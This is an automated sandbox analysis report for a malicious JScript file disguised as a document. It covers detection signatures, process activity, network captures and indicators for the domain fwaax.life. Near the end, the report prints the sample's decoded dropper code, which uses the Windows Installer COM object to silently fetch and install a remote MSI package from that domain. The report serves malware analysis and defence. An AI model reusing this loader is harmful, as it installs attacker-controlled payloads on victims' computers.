Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document-v23-08-15.js

Overview

General Information

Sample name:Document-v23-08-15.js
Analysis ID:1558931
MD5:2259006bb72bb1f4752bd035b4b00175
SHA1:d27dcb7a170d42cd2af5b2918dad70da1bea4b2b
SHA256:2dbddc1b299419296c4e9fad92efdeaec4948bf165238a70c930c6fd02a4beb9
Tags:BruteRatelBruteRatelC4jsuser-k3dg3___
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 7352 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-v23-08-15.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • msiexec.exe (PID: 7396 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-v23-08-15.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-v23-08-15.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-v23-08-15.js", ProcessId: 7352, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.20.51, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 7396, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-v23-08-15.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-v23-08-15.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-v23-08-15.js", ProcessId: 7352, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 104.21.20.51:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /merd.php HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: fwaax.life
Source: global trafficDNS traffic detected: DNS query: fwaax.life
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 23:16:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-storeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nDrFQ7KtHKQLqfcOR7LyojyWJ9v%2Bna9sgHCI%2B9Zrw7FMzNGBapYCCxfP2EUMXpZpEEP8VmBsTUOASmRv2OC8vvo3sKvwdh%2Fmt7n9t%2FanFS9daa5Gyrorv%2FUmTVZl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e53e93a08ca80cd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1702&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=726&delivery_rate=1645070&cwnd=177&unsent_bytes=0&cid=038c61eb76d74b7d&ts=508&x=0"
Source: wscript.exe, 00000000.00000003.1673173052.0000016240C06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1806043328.000001623EEB0000.00000004.00000020.00020000.00000000.sdmp, Document-v23-08-15.jsString found in binary or memory: https://fwaax.life/merd.php
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 104.21.20.51:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

barindex
Source: Document-v23-08-15.jsStatic file information: Suspicious name
Source: C:\Windows\System32\wscript.exeCOM Object queried: Microsoft Windows Installer HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C1090-0000-0000-C000-000000000046}Jump to behavior
Source: Document-v23-08-15.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal52.winJS@2/0@1/1
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-v23-08-15.js"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 7468Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation2
Scripting
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Process Injection
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://fwaax.life/merd.php0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
fwaax.life
104.21.20.51
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://fwaax.life/merd.phpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    104.21.20.51
    fwaax.lifeUnited States
    13335CLOUDFLARENETUSfalse
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1558931
    Start date and time:2024-11-20 00:16:05 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 3m 49s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • GSI enabled (Javascript)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:Document-v23-08-15.js
    Detection:MAL
    Classification:mal52.winJS@2/0@1/1
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .js
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • VT rate limit hit for: Document-v23-08-15.js
    TimeTypeDescription
    18:16:58API Interceptor1x Sleep call for process: msiexec.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    104.21.20.51Document-v20-19-06.jsGet hashmaliciousUnknownBrowse
      Document-v20-19-06.jsGet hashmaliciousUnknownBrowse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        fwaax.lifeDocument-v20-19-06.jsGet hashmaliciousUnknownBrowse
        • 104.21.20.51
        Document-v20-19-06.jsGet hashmaliciousUnknownBrowse
        • 104.21.20.51
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
        • 188.114.96.3
        file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
        • 188.114.96.3
        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
        • 188.114.97.3
        nested-phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        https://s.id/sharedocumentGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        NTS_eTaxInvoice.htmlGet hashmaliciousUnknownBrowse
        • 104.17.25.14
        QuarantineMessage.zipGet hashmaliciousUnknownBrowse
        • 172.67.74.152
        https://usapress.info/inside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years/Get hashmaliciousUnknownBrowse
        • 141.101.120.10
        https://l.facebook.com/l.php?u=https%3A%2F%2Fusapress.info%2Finside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years%2F%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR0r3IVxCUPtQPPqP5Ce0_adoAsiHgG3Oy1cYDq3k1JXBIrTGLtjToxlazM_aem_q02YsKkKY0QB_fm5suzUDw&h=AT1Xo_CkNlagO29_sds-m5zdTBZ6-H70m0J__7wjjmSNinwNGqBfRUFK3cH2zXJWNO7msrJPRkNulrkTmUCLkRNMcfCJTNK-cs4SfUQyRy7nw3vP1DNmFisBvlttaen8fHfi-N3lXN_BGQgdBw&__tn__=R%5D-R&c%5B0%5D=AT3euz91upHKeMVK8p24ktUFKClJ0GKt_3lJnV9tGakx0Tro3u7Ymk1z4tOG4eBZxcuD-Ny10eAla4iUyfdG04Fh4GryHwAMuELGG4dQctfWKiu4mfB-eLJ8Qktnq0ptzD_TaZEPEMHQnvP4W65jDpc-XBmWlMSmaRM-2soPhaPGYAODWegqP8h47S90Q2hmwQvQgUDdb35OgV1duzzqudMAyOk7e8E7mfpnrlwhIvWwUkK53AUNuPTqYkQGet hashmaliciousUnknownBrowse
        • 104.16.192.58
        http://volunteeraudio.comGet hashmaliciousUnknownBrowse
        • 162.159.140.33
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
        • 104.21.20.51
        nested-phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
        • 104.21.20.51
        https://s.id/sharedocumentGet hashmaliciousUnknownBrowse
        • 104.21.20.51
        NTS_eTaxInvoice.htmlGet hashmaliciousUnknownBrowse
        • 104.21.20.51
        QuarantineMessage.zipGet hashmaliciousUnknownBrowse
        • 104.21.20.51
        https://usapress.info/inside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years/Get hashmaliciousUnknownBrowse
        • 104.21.20.51
        https://l.facebook.com/l.php?u=https%3A%2F%2Fusapress.info%2Finside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years%2F%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR0r3IVxCUPtQPPqP5Ce0_adoAsiHgG3Oy1cYDq3k1JXBIrTGLtjToxlazM_aem_q02YsKkKY0QB_fm5suzUDw&h=AT1Xo_CkNlagO29_sds-m5zdTBZ6-H70m0J__7wjjmSNinwNGqBfRUFK3cH2zXJWNO7msrJPRkNulrkTmUCLkRNMcfCJTNK-cs4SfUQyRy7nw3vP1DNmFisBvlttaen8fHfi-N3lXN_BGQgdBw&__tn__=R%5D-R&c%5B0%5D=AT3euz91upHKeMVK8p24ktUFKClJ0GKt_3lJnV9tGakx0Tro3u7Ymk1z4tOG4eBZxcuD-Ny10eAla4iUyfdG04Fh4GryHwAMuELGG4dQctfWKiu4mfB-eLJ8Qktnq0ptzD_TaZEPEMHQnvP4W65jDpc-XBmWlMSmaRM-2soPhaPGYAODWegqP8h47S90Q2hmwQvQgUDdb35OgV1duzzqudMAyOk7e8E7mfpnrlwhIvWwUkK53AUNuPTqYkQGet hashmaliciousUnknownBrowse
        • 104.21.20.51
        http://blacksaltys.comGet hashmaliciousUnknownBrowse
        • 104.21.20.51
        http://volunteeraudio.comGet hashmaliciousUnknownBrowse
        • 104.21.20.51
        http://trackflower.shopGet hashmaliciousUnknownBrowse
        • 104.21.20.51
        No context
        No created / dropped files found
        File type:ASCII text, with CRLF line terminators
        Entropy (8bit):5.8529204333308735
        TrID:
          File name:Document-v23-08-15.js
          File size:49'591 bytes
          MD5:2259006bb72bb1f4752bd035b4b00175
          SHA1:d27dcb7a170d42cd2af5b2918dad70da1bea4b2b
          SHA256:2dbddc1b299419296c4e9fad92efdeaec4948bf165238a70c930c6fd02a4beb9
          SHA512:7b5d3de366834f29565c449431632f9b8d290b0d84b117f0dcfcf17e886de87b9c98c82959f699f1e9a1dd8db0cbcb68769b3bc8d6baf69ea28f387d2d85e3cf
          SSDEEP:768:PKQ1XSQAMIbTv4sJOL1KAiFxL1NeNNtjNDQeEzpJiDfqhMgbVWbFeAq:CQhSQIbTgsJ9ZQNNtjNZ+pJiDGpptAq
          TLSH:4A23DF212C9BFCF41244326C1DF166B0ED919226E4B593C6C4CFF3B8054A79DAE660EB
          File Content Preview:(function () {..// SIG // Begin signature block.. var j = new ActiveXObject("WindowsInstaller.Installer");..// SIG // rD6KzLHweF3A4CkGeX8y1uhT2pe2RYPK1F7ZDeq0.....// SIG // qHEhvN3gv7MdFelBrIDrYDaMX93vMORZ8F5CEwCC.....// SIG // KEYEyCatSFqB2fME1pbvzhKK
          Icon Hash:68d69b8bb6aa9a86
          TimestampSource PortDest PortSource IPDest IP
          Nov 20, 2024 00:16:57.948474884 CET49730443192.168.2.4104.21.20.51
          Nov 20, 2024 00:16:57.948569059 CET44349730104.21.20.51192.168.2.4
          Nov 20, 2024 00:16:57.948657990 CET49730443192.168.2.4104.21.20.51
          Nov 20, 2024 00:16:57.950376034 CET49730443192.168.2.4104.21.20.51
          Nov 20, 2024 00:16:57.950412035 CET44349730104.21.20.51192.168.2.4
          Nov 20, 2024 00:16:58.440393925 CET44349730104.21.20.51192.168.2.4
          Nov 20, 2024 00:16:58.440459967 CET49730443192.168.2.4104.21.20.51
          Nov 20, 2024 00:16:58.467052937 CET49730443192.168.2.4104.21.20.51
          Nov 20, 2024 00:16:58.467082977 CET44349730104.21.20.51192.168.2.4
          Nov 20, 2024 00:16:58.467415094 CET44349730104.21.20.51192.168.2.4
          Nov 20, 2024 00:16:58.511087894 CET49730443192.168.2.4104.21.20.51
          Nov 20, 2024 00:16:58.551354885 CET44349730104.21.20.51192.168.2.4
          Nov 20, 2024 00:16:58.932424068 CET44349730104.21.20.51192.168.2.4
          Nov 20, 2024 00:16:58.932482004 CET44349730104.21.20.51192.168.2.4
          Nov 20, 2024 00:16:58.932548046 CET49730443192.168.2.4104.21.20.51
          Nov 20, 2024 00:16:58.933715105 CET49730443192.168.2.4104.21.20.51
          Nov 20, 2024 00:16:58.933762074 CET44349730104.21.20.51192.168.2.4
          Nov 20, 2024 00:16:58.933792114 CET49730443192.168.2.4104.21.20.51
          Nov 20, 2024 00:16:58.933809042 CET44349730104.21.20.51192.168.2.4
          TimestampSource PortDest PortSource IPDest IP
          Nov 20, 2024 00:16:57.929948092 CET5772753192.168.2.41.1.1.1
          Nov 20, 2024 00:16:57.943404913 CET53577271.1.1.1192.168.2.4
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Nov 20, 2024 00:16:57.929948092 CET192.168.2.41.1.1.10xa549Standard query (0)fwaax.lifeA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Nov 20, 2024 00:16:57.943404913 CET1.1.1.1192.168.2.40xa549No error (0)fwaax.life104.21.20.51A (IP address)IN (0x0001)false
          Nov 20, 2024 00:16:57.943404913 CET1.1.1.1192.168.2.40xa549No error (0)fwaax.life172.67.191.134A (IP address)IN (0x0001)false
          • fwaax.life
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449730104.21.20.514437396C:\Windows\System32\msiexec.exe
          TimestampBytes transferredDirectionData
          2024-11-19 23:16:58 UTC112OUTGET /merd.php HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Windows Installer
          Host: fwaax.life
          2024-11-19 23:16:58 UTC788INHTTP/1.1 404 Not Found
          Date: Tue, 19 Nov 2024 23:16:58 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Cache-Control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nDrFQ7KtHKQLqfcOR7LyojyWJ9v%2Bna9sgHCI%2B9Zrw7FMzNGBapYCCxfP2EUMXpZpEEP8VmBsTUOASmRv2OC8vvo3sKvwdh%2Fmt7n9t%2FanFS9daa5Gyrorv%2FUmTVZl"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8e53e93a08ca80cd-EWR
          alt-svc: h3=":443"; ma=86400
          server-timing: cfL4;desc="?proto=TCP&rtt=1702&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=726&delivery_rate=1645070&cwnd=177&unsent_bytes=0&cid=038c61eb76d74b7d&ts=508&x=0"
          2024-11-19 23:16:58 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:18:16:56
          Start date:19/11/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-v23-08-15.js"
          Imagebase:0x7ff6a1c50000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:1
          Start time:18:16:57
          Start date:19/11/2024
          Path:C:\Windows\System32\msiexec.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\msiexec.exe /V
          Imagebase:0x7ff70f6f0000
          File size:69'632 bytes
          MD5 hash:E5DA170027542E25EDE42FC54C929077
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Call Graph

          • Executed
          • Not Executed
          callgraph clusterC0 clusterC2C0 clusterC4C2 E1C0 entry:C0 F3C2 E1C0->F3C2 F5C4 ActiveXObject("WindowsInstaller.Installer")

          Script:

          Code
          0
          ( function () {
          • () ➔ undefined
          • () ➔ undefined
          1
          var j = new ActiveXObject ( "WindowsInstaller.Installer" );
            2
            j.UILevel = 2;
              3
              var methods = [ "iNstallproduct" ];
                4
                j[methods[0]] ( "https://fwaax.life/merd.php" );
                • iNstallproduct("https://fwaax.life/merd.php") ➔ undefined
                5
                } ) ( );
                  Reset < >